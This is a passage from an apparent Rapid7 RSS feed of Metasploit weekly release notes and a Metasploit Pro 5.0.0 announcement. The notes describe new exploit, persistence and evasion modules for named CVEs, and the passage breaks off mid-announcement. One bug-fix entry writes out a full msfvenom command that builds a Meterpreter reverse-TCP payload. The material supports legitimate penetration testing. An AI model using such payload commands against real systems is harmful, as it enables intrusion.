The module exploits the Direct Install feature to upload a malicious plugin ZIP and execute an arbitrary PHP payload as the web server user.</p><h3>Generic HTTP Command Execution</h3><p>Authors: egypt <a href="mailto:egypt@metasploit.com">egypt@metasploit.com</a> and g0tmi1k</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21023">#21023</a> contributed by <a href="https://github.com/g0tmi1k">g0tmi1k</a></p><p>Path: multi/http/os_cmd_exec</p><p>Description: Adds a new exploits/multi/http/os_cmd_exec module that targets generic HTTP command execution vulnerabilities where user-supplied input is directly passed to system execution functions via an HTTP request.</p><h3>Windows Persistence via UserInitMprLogonScript</h3><p>Author: Nayera</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21032">#21032</a> contributed by <a href="https://github.com/Nayeraneru">Nayeraneru</a></p><p>Path: windows/persistence/userinit_mpr_logon_script</p><p>Description: This adds a new Windows persistence module that abuses the HKCU\Environment\UserInitMprLogonScript registry value to execute a payload at user logon.</p><h3>HTTP and HTTPS Fetch</h3><p>Authors: Brendan Watters, Chris John Riley, hdm <a href="mailto:x@hdm.io">x@hdm.io</a>, sf <a href="mailto:stephen_fewer@harmonysecurity.com">stephen_fewer@harmonysecurity.com</a>, and vlad902 <a href="mailto:vlad902@gmail.com">vlad902@gmail.com</a></p><p>Type: Payload (Adapter)</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21172">#21172</a> contributed by <a href="https://github.com/bwatters-r7">bwatters-r7</a></p><p>Description: This adds HTTP and HTTPS fetch payloads for 32-bit Windows targets.</p><h2>Enhancements and features (8)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20999">#20999</a> from <a href="https://github.com/Aaditya1273">Aaditya1273</a> - Removes the legacy 
windows/local/persistence module, which has been superseded by the modernized windows/persistence/registry module. A moved_from alias ensures that existing scripts and workflows referencing the old module path are automatically redirected to the new one with a deprecation warning.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21090">#21090</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Updates multiple modules to make use of report_service().</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21097">#21097</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Updates auxiliary/scanner/ftp/anonymous.rb to report the FTP service regardless of anonymous being enabled.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21144">#21144</a> from <a href="https://github.com/Nayeraneru">Nayeraneru</a> - Improves YARD documentation for lib/msf/core/auxiliary/web/http.rb by documenting the Request and Response helpers, the public HTTP request APIs, and the internal custom-404/request-handling flow.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21145">#21145</a> from <a href="https://github.com/Nayeraneru">Nayeraneru</a> - Adds YARD docs to lib/msf/core/auxiliary/auth_brute.rb, focusing on the AuthBrute mixin’s credential-building, brute-force state, logging, and cleanup helpers.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21150">#21150</a> from <a href="https://github.com/Nayeraneru">Nayeraneru</a> - Adds YARD documentation to lib/msf/core/payload/adapter/fetch.rb to improve consistency and clarify how the fetch adapter generates URIs, builds fetch commands, and resolves platform-specific execution behavior.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21194">#21194</a> from <a href="https://github.com/bcoles">bcoles</a> - This updates the post/linux/gather/enum_protections module by adding documentation and additional checks for 
modern protections and applications.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21214">#21214</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Adds additional validation to db_import before attempting to import values.</li></ul><h2>Bugs fixed (6)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21004">#21004</a> from <a href="https://github.com/EclipseAditya">EclipseAditya</a> - This fixes a bug in the #normalize_key method provided by the Windows Registry mixin. The result is correct behavior when using shell sessions to check for keys with trailing \ characters.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21138">#21138</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Fixes a bug that stopped the auxiliary/server/dhcp module from running as a background job when RHOSTS had been set.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21188">#21188</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a crash on older Ruby versions when scanning binary files.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21199">#21199</a> from <a href="https://github.com/Hemang360">Hemang360</a> - Fixes crash in auxiliary/scanner/http/wp_perfect_survey_sqli when run against invalid or unreachable targets.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21207">#21207</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Fixes warning when running the linux/gather/enum_protections module.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21208">#21208</a> from 
<a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes multiple warnings in modules that reported notes incorrectly.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21073">#21073</a> from <a href="https://github.com/Hemang360">Hemang360</a> - Fixes a bug where running exploit/multi/handler with a reverse HTTP/HTTPS payload multiple times on the same port caused cleanup issues.</li></ul><h2>Documentation added (6)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21149">#21149</a> from <a href="https://github.com/Adithyadspawar">Adithyadspawar</a> - Adds documentation to the following auxiliary scanner modules: ftp/bison_ftp_traversal, http/apache_activemq_traversal, http/coldfusion_version, http/drupal_views_user_enum and http/elasticsearch_traversal.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21186">#21186</a> from <a href="https://github.com/Devansh7006">Devansh7006</a> - Adds documentation for the wordpress_pingback_access module.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21187">#21187</a> from <a href="https://github.com/Devansh7006">Devansh7006</a> - Updates documentation for auxiliary/scanner/http/http_put.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21200">#21200</a> from <a href="https://github.com/dineshg0pal">dineshg0pal</a> - Updates the example code snippet for writing Metasploit Go modules.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21201">#21201</a> from <a href="https://github.com/aryan9190">aryan9190</a> - Adds YARD documentation for the Rex::Post::IO class.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21217">#21217</a> from <a href="https://github.com/dineshg0pal">dineshg0pal</a> - Fixes minor errors in documentation files.</li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As 
always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-03-26T11%3A49%3A13Z..2026-04-02T10%3A24%3A13Z%22">Pull Requests 6.4.124...6.4.125</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.124...6.4.125">Full diff 6.4.124...6.4.125</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a>.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-04-03-2026</link>
      <guid isPermaLink="false">blt5f25f7ef5fc9cc1d</guid>
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category><dc:creator><![CDATA[Simon Janusz]]></dc:creator>
      <pubDate>Fri, 03 Apr 2026 19:06:10 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0475760a2990dfd7/6849ab41a770d7563190a3ea/metasploit-fence.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 03/27/2026]]></title>
      <description><![CDATA[<h2>Better NTLM Relaying Functionality</h2><p>This week’s release brings an improvement to the SMB NTLM relay server. In the past, its support has been expanded with modules for relaying to HTTP (ESC8), MSSQL and LDAP while still receiving connections over the humble SMB service. Prior to this release, clients required a key behavior in how they handled SMB’s STATUS_NETWORK_SESSION_EXPIRED error code in order to relay a single authentication attempt to multiple targets. Most clients other than Windows’ “net use” do not handle these errors and were thus incompatible with Metasploit’s SMB NTLM relaying capabilities. Now, when a single target is specified, Metasploit alters its relaying strategy to forward the Net-NTLM messages immediately, making it compatible with a broader range of clients including Linux’s smbclient. In addition, the client in RubySMB was updated to mimic the behaviour of “net use”, allowing authentication attempts from RubySMB to be relayed to multiple targets successfully.</p><h2>New module content (3)</h2><h3>ESC/POS Printer Command Injector</h3><p>Author: FutileSkills</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20478">#20478</a> contributed by <a href="https://github.com/futileskills">futileskills</a></p><p>Path: admin/printer/escpos_tcp_command_injector</p><p>Description: Adds a new auxiliary module that exploits CVE-2026-23767, an unauthenticated ESC/POS command vulnerability in networked Epson-compatible printers. 
The vulnerability allows an attacker to send crafted commands over the network to inject custom ESC/POS print commands, which are used in various receipt printers.</p><h3>Eclipse Che machine-exec Unauthenticated RCE</h3><p>Authors: Greg Durys <a href="mailto:gregdurys.security@proton.me">gregdurys.security@proton.me</a> and Richard Leach</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20835">#20835</a> contributed by <a href="https://github.com/GregDurys">GregDurys</a></p><p>Path: linux/http/eclipse_che_machine_exec_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-12548&amp;referrer=blog">CVE-2025-12548</a></p><p>Description: This adds a module for CVE-2025-12548, an unauthenticated RCE in the Eclipse Che machine-exec service. The vulnerability allows attackers to connect over WebSocket on port 3333 and execute commands via JSON-RPC without authentication. This affects Red Hat OpenShift DevSpaces environments.</p><h3>Barracuda ESG TAR Filename Command Injection</h3><p>Authors: Curt Hyvarinen, Mandiant, and cfielding-r7</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21033">#21033</a> contributed by <a href="https://github.com/Alpenlol">Alpenlol</a></p><p>Path: linux/smtp/barracuda_esg_tarfile_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2023-2868&amp;referrer=blog">CVE-2023-2868</a></p><p>Description: Adds an exploit module for CVE-2023-2868, a command injection vulnerability in Barracuda Email Security Gateway (ESG) appliances. 
Filenames in TAR attachments are passed to shell commands without sanitization, allowing RCE via backtick injection.</p><h2>Enhancements and features (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21049">#21049</a> from <a href="https://github.com/h00die">h00die</a> - This updates post modules to use an API that will expand multiple environment variables when set within the WritableDir option.</li></ul><h2>Bugs fixed (5)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20967">#20967</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - This fixes an issue that prevented successful authentication relay from the RubySMB client and smbclient. These clients are now compatible with Msf::Exploit::Remote::SMB::RelayServer.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21148">#21148</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a bug where setting VERBOSE logging to false globally would still cause verbose logging to occur.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21169">#21169</a> from <a href="https://github.com/SaiSakthidar">SaiSakthidar</a> - This fixes a bug that was preventing Mach-O binaries from being identified due to a Ruby string encoding compatibility problem.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21173">#21173</a> from <a href="https://github.com/msutovsky-r7">msutovsky-r7</a> - Fixes a crash when attempting to generate a VBS payload with msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=44 -f vbs.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21174">#21174</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a bug when parsing msfconsole's -x flag when additional semicolons are present that are not meant to separate commands, i.e. 
msfconsole -x 'set option_name "a;b"'.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-03-18T23%3A56%3A12Z..2026-03-26T11%3A49%3A13Z%22">Pull Requests 6.4.123...6.4.124</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.123...6.4.124">Full diff 6.4.123...6.4.124</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a>.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-03-27-2026</link>
      <guid isPermaLink="false">blt65197b62038306df</guid>
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category><dc:creator><![CDATA[Spencer McIntyre]]></dc:creator>
      <pubDate>Fri, 27 Mar 2026 20:48:03 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0d50271a40a5f14f/6849ab419621d9f3824d5017/metasploit-sky.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 03/20/2026]]></title>
      <description><![CDATA[<h2>♫ I Just Called ♫ To Say ♫ 7f45 4c46 0201 0100 0000 0000 0000 0000 0300 3e00 0100♫</h2><p>This release contains 2 new exploit modules, 2 enhancements, and 7 bug fixes. Community contributor Chocapikk submitted both exploit modules this release: one targeting AVideo-Encoder’s getImage.php file and another targeting FreePBX. Leading the enhancements is a granularization for LDAP queries allowing the omission of SACL data on security descriptors, as without the proper permissions the entire query of the security descriptor will fail if the SACL data is even just a part of the query.</p><h2>New module content (2)</h2><h3>AVideo Encoder getImage.php Unauthenticated Command Injection</h3><p>Authors: Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a> and arkmarta</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21076">#21076</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a></p><p>Path: linux/http/avideo_encoder_getimage_cmd_injection</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-29058&amp;referrer=blog">CVE-2026-29058</a></p><p>Description: Adds an exploit module for CVE-2026-29058, an unauthenticated OS command injection in AVideo Encoder's getImage.php endpoint.</p><h3>FreePBX filestore authenticated command injection</h3><p>Authors: Cory Billington and Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a></p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20719">#20719</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a></p><p>Path: unix/http/freepbx_filestore_cmd_injection</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-64328&amp;referrer=blog">CVE-2025-64328</a></p><p>Description: Adds a new Metasploit exploit module for FreePBX filestore authenticated command injection 
(CVE-2025-64328) with automatic vulnerable-version detection and full documentation, and renames the XorcomCompletePbx HTTP mixin to CompletePBX updating affected modules accordingly.</p><h2>Enhancements and features (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20730">#20730</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - This update modifies the ldap_query module to skip querying the SACL (System Access Control List) on security descriptors by default. This behavior is now controlled by a new option, LDAP::QuerySacl. This change is necessary when using a non-privileged user to query security descriptors via LDAP; otherwise, querying the SACL will cause the entire query to be blocked, resulting in no security descriptors being returned.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20997">#20997</a> from <a href="https://github.com/Nayeraneru">Nayeraneru</a> - This adds a new OptTimedelta datastore option type. It enables module authors to specify a time duration and users to set it with a human-friendly syntax.</li></ul><h2>Bugs fixed (7)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20960">#20960</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - This adds a DHCPINTERFACE option to the DHCP server mixin, allowing modules that start that server to specify a particular interface to bind to.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21020">#21020</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - This makes a small change to the docs by removing two lines that were previously duplicated.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21024">#21024</a> from <a href="https://github.com/Aaditya1273">Aaditya1273</a> - Fixes a bug in the JSON-RPC msfrpcd functionality that incorrectly required SSL certificates to be present even when disabled with msfrpcd -S.</li><li><a 
href="https://github.com/rapid7/metasploit-framework/pull/21025">#21025</a> from <a href="https://github.com/Hemang360">Hemang360</a> - Fixes a crash when calling the HTTP cookie jar with non-string values.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21028">#21028</a> from <a href="https://github.com/SilentSobs">SilentSobs</a> - Fixes a crash when using the reload_all command when no module is present.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21081">#21081</a> from <a href="https://github.com/Hemang360">Hemang360</a> - Fixes a crash when using windows/exec with non-ASCII characters.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21139">#21139</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - This fixes a bug in the ldap_esc_vulnerable_cert_finder module that was preventing authentication from working when making a WinRM connection.</li></ul><h2>Documentation added (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21074">#21074</a> from <a href="https://github.com/jeanmtr">jeanmtr</a> - Adds documentation for the pop3_login module.</li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-03-10T20%3A31%3A01Z..2026-03-18T23%3A56%3A12Z%22">Pull Requests 6.4.122...6.4.123</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.122...6.4.123">Full diff 6.4.122...6.4.123</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a>.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-03-20-2026</link>
      <guid isPermaLink="false">blta81ede50bbdc2f0c</guid>
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category><dc:creator><![CDATA[Brendan Watters]]></dc:creator>
      <pubDate>Fri, 20 Mar 2026 20:03:54 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7464fe659cab8a01/6852c358419e54d8e21c3458/blog-metasploit-wrap-up-.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 03/13/2026]]></title>
      <description><![CDATA[<h2>No bad luck here: Friday the 13th brings new modules and a Metasploit Pro milestone</h2><p>This week’s Metasploit Framework release delivers three new modules across reconnaissance, evasion, and exploitation: LeakIX-powered discovery for exposed services and leaked data, a Linux x64 RC4 payload packer for more flexible evasive delivery, and an unauthenticated RCE module for SPIP Saisies (CVE-2025-71243). Alongside those additions, we shipped practical quality-of-life improvements including a smaller configurable bind_netcat payload path, and automatic WordPress service reporting in the WordPress mixin.</p><p>Finally, we’re also excited to share the new Metasploit Pro 5.0.0 release with an updated UI and SSO support amongst other changes; check out the announcement here: <a href="https://www.rapid7.com/blog/post/pt-announcing-metasploit-pro-5-penetration-testing-evolving/">Announcing Metasploit Pro 5: Penetration Testing, Evolving</a>.</p><h2>New module content (3)</h2><h3>LeakIX Search</h3><p>Authors: LeakIX <a href="mailto:support@leakix.net">support@leakix.net</a> and Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a></p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21002">#21002</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a></p><p>Path: gather/leakix_search</p><p>Description: Adds auxiliary/gather/leakix_search, a new module for the LeakIX API, a search engine focused on indexing internet-exposed services and leaked credentials/databases.</p><h3>Linux RC4 Encrypted Payload Generator</h3><p>Author: Massimo Bertocchi</p><p>Type: Evasion</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20966">#20966</a> contributed by <a href="https://github.com/litemars">litemars</a></p><p>Path: linux/x64/rc4_packer</p><p>Description: Adds evasion/linux/x64/rc4_packer, a new packer module that 
encrypts the generated payload with RC4, prepends an optional sleep-based delay (nanosleep), and decrypts/executes the payload at runtime via a compact precompiled stub.</p><h3>SPIP Saisies Plugin Unauthenticated RCE</h3><p>Authors: OpenStudio and Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a></p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21001">#21001</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a></p><p>Path: multi/http/spip_saisies_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-71243&amp;referrer=blog">CVE-2025-71243</a></p><p>Description: This adds a new module for CVE-2025-71243, an unauthenticated PHP code-injection vulnerability in the SPIP Saisies plugin. The injection takes place through _anciennes_valeurs, which allows an attacker to inject a PHP payload.</p><h2>Enhancements and features (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20885">#20885</a> from <a href="https://github.com/dledda-r7">dledda-r7</a> - Updates the bind_netcat payload to allow it to be smaller by selecting either default or BSD-style netcat command syntax. Previously, the payload ran both command syntaxes combined by an OR operator so that wherever it was executed, the payload worked. The default behavior remains to run both, but in the event a user needs a significantly shorter payload, they can select a single netcat syntax and adjust the filenames.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20961">#20961</a> from <a href="https://github.com/Nayeraneru">Nayeraneru</a> - This adds service reporting to the WordPress mixin. 
Now, when you use a WordPress module, it will automatically report the target as WordPress if detected.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-03-05T14%3A49%3A28Z..2026-03-10T20%3A31%3A01Z%22">Pull Requests 6.4.119...6.4.122</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.119...6.4.122">Full diff 6.4.119...6.4.122</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a>.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-03-13-2026</link>
      <guid isPermaLink="false">blt0f4222ed13503dd7</guid>
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category><dc:creator><![CDATA[Dean Welch]]></dc:creator>
      <pubDate>Fri, 13 Mar 2026 19:06:41 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0475760a2990dfd7/6849ab41a770d7563190a3ea/metasploit-fence.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[The Face of Penetration Testing is Changing: Announcing Metasploit Pro 5.0.0]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>The role and demand for red-teaming capabilities are growing, as more exploitable CVEs make their way into criminal hands. Being proactive can no longer be reserved for annual tests; it has become a continuous assessment that determines exposure and validates an organization's security posture. With this in mind, we are delighted to announce the long-awaited availability of </span><span style='font-size: undefined;'><strong>Metasploit Pro 5.0.0 </strong></span><span style='font-size: undefined;'>–</span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>which is not just an update, but a fundamentally new approach to red-teaming, designed with the sole intention of staying ahead of ever more capable threat actors. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Amongst the multitude of changes, Metasploit Pro 5.0.0 offers an intuitive testing workflow that removes the ever-evolving complexity of testing, as well as a suite of powerful new modules and critical enhancements. This is the version you can't afford to miss. For all the technical details, the granular release notes can be viewed </span><a href="https://docs.rapid7.com/insight/release-notes-5.0.0-2026031101/" target="_blank"><span style='font-size: undefined;'>here</span></a><span style='font-size: undefined;'>.</span></p><h2><span style='font-size: undefined;'>So what’s new?</span></h2><h3><span style='font-size: undefined;'>Intuitive testing workflow</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Say goodbye to complexity, as Metasploit Pro has completely overhauled the testing workflow. Updates are highlighted by an intuitive user interface, ensuring that your focus remains on high-value penetration testing and vulnerability validation, not fighting the interface. 
These changes are the foundation for the future, preserving the core functionality you rely on while enabling even more powerful features down the road.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt797cdcb9951018d0/69b1f828c048556821e8504e/image2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image2.png" asset-alt="image2.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt797cdcb9951018d0/69b1f828c048556821e8504e/image2.png" data-sys-asset-uid="blt797cdcb9951018d0" data-sys-asset-filename="image2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image2.png" sys-style-type="display"/></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Stop guessing and start seeing. The new implementation of Network Topology support provides instant, crystal-clear clarity on hosts that have been compromised, have associated cracked credentials, or captured data. For enterprise environments with vast, complex surfaces, we’ve invested in performance improvements, giving you the power to zoom and pan through hundreds of available hosts with zero lag. 
This is actionable visualization that transforms data into defense.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt30934816d54b0800/69b1f8281c794a12b43274c3/image6.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image6.png" asset-alt="image6.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt30934816d54b0800/69b1f8281c794a12b43274c3/image6.png" data-sys-asset-uid="blt30934816d54b0800" data-sys-asset-filename="image6.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image6.png" sys-style-type="display"/></figure><p>⠀</p><h3><span style='font-size: undefined;'>Vulnerability detection improvements</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Get the necessary assurance before you click 'run.' Metasploit modules can now register crucial vulnerability detection details as part of running. This means that modules capable of running pre-check detection logic give you the full intelligence picture before you attempt exploitation. 
This new level of transparency and detail empowers you to make smarter, faster decisions, saving you precious time and minimizing the chance of failed module runs and adverse side effects.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltac4e677f7930cc86/69b1f8287e503c5240b2deb3/image4.png" height="671" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image4.png" asset-alt="image4.png" width="1223" max-width="1223" max-height="671" style="max-width: 1223px; width: 1223px; max-height: 671px; height: 671px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltac4e677f7930cc86/69b1f8287e503c5240b2deb3/image4.png" data-sys-asset-uid="bltac4e677f7930cc86" data-sys-asset-filename="image4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image4.png" sys-style-type="display"/></figure><p>⠀</p><h3><span style='font-size: undefined;'>Advanced workflow improvements</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Unleash your inner expert with unprecedented control and efficiency. Advanced users of Metasploit Pro will immediately benefit from multiple UX improvements to the single module run page. Tired of manually configuring options? 
Users now receive intelligent suggestions for applicable values, including network targets, Kerberos credential cache files, and more –  streamlining ADCS workflows.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltddbbe49d90e28bd9/69b1f8281bca047b72eaa789/image3.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image3.png" asset-alt="image3.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltddbbe49d90e28bd9/69b1f8281bca047b72eaa789/image3.png" data-sys-asset-uid="bltddbbe49d90e28bd9" data-sys-asset-filename="image3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image3.png" sys-style-type="display"/></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Furthermore, you now have the ability to manually choose and configure individual payloads, giving you the final word on how you exploit targets. Metasploit Pro will continue to default to the most common payload for each exploit.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Plus, new quality-of-life improvements for replaying module runs ensure that verifying remediation and re-exploiting targets is a seamless, one-click process. Gone are the days of reconfiguring an entire module run to change a single option. The old list view has also been updated to include the ability to view the module option details that a module was run with. 
